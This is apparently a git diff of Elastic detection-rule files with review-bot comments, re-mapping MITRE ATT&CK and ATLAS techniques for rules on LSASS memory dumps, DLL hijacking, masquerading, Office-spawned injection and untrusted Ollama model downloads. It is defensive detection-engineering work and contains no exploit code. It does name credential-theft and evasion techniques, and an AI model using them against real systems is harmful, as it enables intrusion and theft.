- [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index 5701fe075a7..f135e42a29f 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml 
+++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -26,18 +26,7 @@ references = [ risk_score = 21 rule_id = "e9a3b2c1-d4f5-6789-0abc-def123456789" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "OS: macOS", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Domain: LLM", - "Mitre Atlas: T0010.003", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Linux", "OS: macOS", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Initial Access", "Data Source: Elastic Defend", "Domain: LLM", "Mitre Atlas: T0010.003", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" 
@@ -56,31 +45,49 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.004" +name = "DNS" +reference = "https://attack.mitre.org/techniques/T1071/004/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0012" +name = "Valid Accounts" +reference = "https://atlas.mitre.org/techniques/AML.T0012/" + +[rule.threat.tactic] +id = "AML.TA0004" +name = "Initial Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0004/" diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 74f8692331c..9ec279e6d2c 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
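Review bot: The new `MITRE ATLAS` entry maps the rule to `AML.T0012` Valid Accounts, which does not describe an Ollama model pulled from an untrusted source, and it disagrees with the rule's own `Mitre Atlas: T0010.003` tag kept in the earlier hunk (AI Supply Chain Compromise: Model). I'd point the entry at the technique the tag already names, `id = "AML.T0010"` with an `AML.T0010.003` / `Model` subtechnique if the schema allows subtechniques for ATLAS entries, and verify the display name and reference URL against the current ATLAS data rather than my recollection. Separately, swapping T1105 for `T1071.004` is a stretch: that subtechnique covers DNS used as a C2 channel, while the query (`network where event.action == "lookup_requested"`) is a name lookup for a model registry host, so T1105 is the closer fit. The query body continues outside this hunk.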
@@ -31,19 +31,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Protection", - "Use Case: Threat Detection", - "Use Case: Identity Threat Detection", - "Tactic: Credential Access", - "Tactic: Initial Access", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Initial Access", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Use Case: Threat Detection", "Use Case: Identity Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -54,29 +42,17 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1110" -name = "Brute Force" -reference = "https://attack.mitre.org/techniques/T1110/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 6eb634e33de..2981a5ea562 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml 
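Review bot: The removed entry drops T1110 Brute Force and with it the whole Credential Access mapping, yet Entra ID Protection risk detections (the `event.code:AadRiskDetection` query in the hunk header) include password-spray and leaked-credential detections as I recall the product docs, which are credential-access signals rather than initial-access ones; the file also keeps its `credential_access_` prefix. I'd keep a Credential Access `[[rule.threat]]` with `T1110` (arguably with the `T1110.003` Password Spraying subtechnique) next to the T1078.004 entry and restore `Tactic: Credential Access` in the tags hunk above, or else rename the file so its prefix matches the single remaining tactic. The risk-detection-type claim should be checked against the rule's query, which continues outside this hunk.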
+++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -49,14 +49,18 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml index 666c28d4f06..bef39605f7d 100644 --- a/rules_building_block/credential_access_mdmp_file_unusual_extension.toml +++ b/rules_building_block/credential_access_mdmp_file_unusual_extension.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/09/21" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -20,15 +20,7 @@ name = "Memory Dump File with Unusual Extension" risk_score = 21 rule_id = "c0b9dc99-c696-4779-b086-0d37dc2b3778" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -52,36 +44,18 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1003" -name = "OS Credential Dumping" -reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.001" -name = "LSASS Memory" -reference = "https://attack.mitre.org/techniques/T1003/001/" - - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.008" name = "Masquerade File Type" reference = "https://attack.mitre.org/techniques/T1036/008/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 87e086c3d31..9c6d6a93c4a 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
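Review bot: The removed entry drops T1003.001 LSASS Memory, leaving only T1036.008, yet a rule named `Memory Dump File with Unusual Extension` (hunk header above) is interesting precisely because a renamed minidump is the usual way an LSASS dump is smuggled off a host; the file also keeps its `credential_access_` prefix. Unless the query (outside this hunk) is intentionally generic across all process dumps, I'd keep the Credential Access entry, `id = "T1003"` with the `T1003.001` subtechnique, beside the masquerading one, and keep `Tactic: Credential Access` in the tags hunk above. If the generic reading is intended, the filename prefix should follow the remaining tactic.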
@@ -83,24 +83,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 79332fc5371..62320b4e83b 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -40,24 +40,18 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" [[rule.threat.technique.subtechnique]] -id = "T1218.011" -name = "Rundll32" -reference = "https://attack.mitre.org/techniques/T1218/011/" - - +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - 
diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 0e65e8b4c34..79afd7ac201 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -24,14 +24,7 @@ references = [ risk_score = 21 rule_id = "8d366588-cbd6-43ba-95b4-0971c3f906e5" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" 
@@ -61,36 +54,18 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" [[rule.threat.technique.subtechnique]] -id = "T1566.002" -name = "Spearphishing Link" -reference = "https://attack.mitre.org/techniques/T1566/002/" - - +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index 2eecbdb9c35..b530926ee0b 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
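Review bot: The new mapping puts a file-creation rule (`file where host.os.type == "windows" and event.type == "creation"` in the hunk header) under T1204.002 Malicious File, which describes the user running the file, an action this event never observes. T1204.002 is defensible as a detection mapping, but the removed Initial Access entry (T1566.001/.002) described the delivery stage the rule actually sees, and dropping it moves the rule's only tactic to one the event cannot evidence. I'd keep `T1566` with the `T1566.002` Spearphishing Link subtechnique under Initial Access alongside the new Execution entry, and keep `Tactic: Initial Access` in the tags hunk above; the file's `defense_evasion_` prefix then needs revisiting too. The query continues outside this hunk.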
@@ -78,26 +78,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index 845c9e5546e..b06cf6f55fc 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -52,19 +52,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" - +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 6d1c96172e8..563b76b541a 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,16 +21,7 @@ name = "Potential Process Injection from Malicious Document" risk_score = 21 rule_id = "1c5a04ae-d034-41bf-b0d8-96439b5cc774" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Privilege Escalation", - "Tactic: Initial Access", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Execution", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" 
@@ -52,43 +43,23 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1566" -name = "Phishing" -reference = "https://attack.mitre.org/techniques/T1566/" -[[rule.threat.technique.subtechnique]] -id = "T1566.001" -name = "Spearphishing Attachment" -reference = "https://attack.mitre.org/techniques/T1566/001/" - +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_masquerading_browsers.toml b/rules_building_block/defense_evasion_masquerading_browsers.toml index cb67a25bd91..c86c12b0ea8 100644 --- a/rules_building_block/defense_evasion_masquerading_browsers.toml +++ b/rules_building_block/defense_evasion_masquerading_browsers.toml 
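Review bot: The new mapping removes every T1055 Process Injection entry while the rule is still named `Potential Process Injection from Malicious Document` (hunk header in the tags hunk above), so the title and the ATT&CK mapping now disagree. The added T1203 and T1204.002 cover how the document got executed, not the injection the rule claims to detect; I'd keep `T1055` under Defense Evasion (the Privilege Escalation copy was the redundant one) next to the new Execution entry and re-add `Tactic: Defense Evasion` in the tags hunk. If the query, which starts outside this hunk, really only sees Office spawning a child process rather than injection, the rule name should change instead.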
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/02" integration = ["endpoint"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as Browser Process" risk_score = 21 rule_id = "5b9eb30f-87d6-45f4-9289-2bf2024f0376" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", - "Data Source: Elastic Defend", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Defense Evasion", "Data Source: Elastic Defend"] timestamp_override = "event.ingested" type = "eql" @@ -169,10 +161,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -183,22 +177,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml index a05035ab822..9afa0bc4d07 100644 --- a/rules_building_block/defense_evasion_masquerading_vlc_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_vlc_dll.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/09" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as VLC DLL" risk_score = 21 rule_id = "4494c14f-5ff8-4ed2-8e99-bf816a1642fc" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -45,10 +37,12 @@ library where host.os.type == "windows" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -59,22 +53,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index afce0c6f8cd..d237951b5e4 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -21,15 +21,7 @@ name = "Potential Masquerading as System32 DLL" risk_score = 21 rule_id = "fb01d790-9f74-4e76-97dd-b4b0f7bf6435" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -108,10 +100,12 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" 
@@ -122,37 +116,17 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index 884c457808b..a27af3e29e5 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -20,15 +20,7 @@ name = "Potential Masquerading as System32 Executable" risk_score = 21 rule_id = "79ce2c96-72f7-44f9-88ef-60fa1ac2ce47" severity = "low" -tags = [ - "Domain: Endpoint", - "Data Source: Elastic Defend", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" @@ -82,10 +74,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -96,22 +90,7 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1554" -name = "Compromise Host Software Binary" -reference = "https://attack.mitre.org/techniques/T1554/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index eb6a59b0199..ee7da379d9e 100644 --- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -31,18 +31,7 @@ setup = """### Additional notes For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts). """ severity = "low" -tags = [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: Microsoft 365 Audit Logs", - "Data Source: Microsoft Purview", - "Use Case: Threat Detection", - "Use Case: Configuration Auditing", - "Tactic: Defense Evasion", - "Tactic: Persistence", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Domain: SaaS", "Tactic: Defense Evasion", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Microsoft 365", "Data Source: Microsoft 365 Audit Logs", "Data Source: Microsoft Purview", "Use Case: Threat Detection", "Use Case: Configuration Auditing", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" 
